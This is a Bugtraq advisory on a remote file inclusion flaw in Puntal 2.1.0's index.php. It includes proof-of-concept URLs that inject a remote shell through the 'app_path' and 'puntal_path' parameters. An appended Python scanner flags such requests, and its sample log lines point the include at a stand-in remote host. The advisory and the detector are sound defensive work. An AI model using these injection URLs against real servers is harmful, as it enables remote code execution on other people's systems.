Puntal (index.php) Remote File Inclusion Vulnerabilities
From: eidelweiss cyberservices com
To: bugtraq securityfocus com
Cc:
Subject: Puntal (index.php) Remote File Inclusion Vulnerabilities
Date: Mon - May 03, 2010 11:25 AM
Puntal could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially-crafted URL request to the "index.php" script using the "app_path=" OR "puntal_path=" parameter to specify a malicious PHP file from a remote system, which would allow the attacker to execute arbitrary code on the vulnerable system.
Puntal 2.1.0 is vulnerable; other versions may also be affected.
An attacker can exploit these issues via a browser.
-=[P0C]=-
http://127.0.0.1//path/index.php?app_path= [inj3ct0r sh3ll]
or
http://127.0.0.1//path/index.php?puntal_path= [inj3ct0r sh3ll]
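
A log check for the request pattern described above, added here as an example and not part of the original advisory. It flags requests to index.php whose "app_path" or "puntal_path" value names a remote location. The Common Log Format, the scheme list and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl, unquote

# The two parameters named in the advisory.
RFI_PARAMS = {"app_path", "puntal_path"}
# Values that point outside the local filesystem (assumed scheme list).
REMOTE_VALUE = re.compile(r"^\s*(?:(?:https?|ftps?|php|expect)://|//|data:)", re.I)
# Request field of a Common Log Format line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return (param, decoded value) pairs that hand index.php a remote location."""
    path, _, query = target.partition("?")
    if not path.lower().endswith("index.php"):
        return []
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value)  # second pass catches double-encoded values
        if name.lower() in RFI_PARAMS and REMOTE_VALUE.search(decoded):
            hits.append((name, decoded))
    return hits


def scan(lines):
    """Return (line number, param, value) for every matching request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            for name, value in suspicious_params(match.group(1)):
                findings.append((number, name, value))
    return findings


# Constructed sample lines (documentation addresses, reserved .invalid host).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/May/2010:11:30:01 +0000] "GET /puntal/index.php?app_path=http://example.invalid/s.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [03/May/2010:11:30:05 +0000] "GET /puntal/index.php?page=news HTTP/1.1" 200 2048',
    '192.0.2.12 - - [03/May/2010:11:31:10 +0000] "GET /puntal/index.php?puntal_path=http%253A%252F%252Fexample.invalid%252Fs.txt HTTP/1.1" 200 512',
    '192.0.2.13 - - [03/May/2010:11:32:00 +0000] "GET /puntal/index.php?app_path=./ HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print("line %d: %s=%s" % finding)
```

A hit in the log shows only that such a request was received; whether the include succeeded has to be confirmed from the server side.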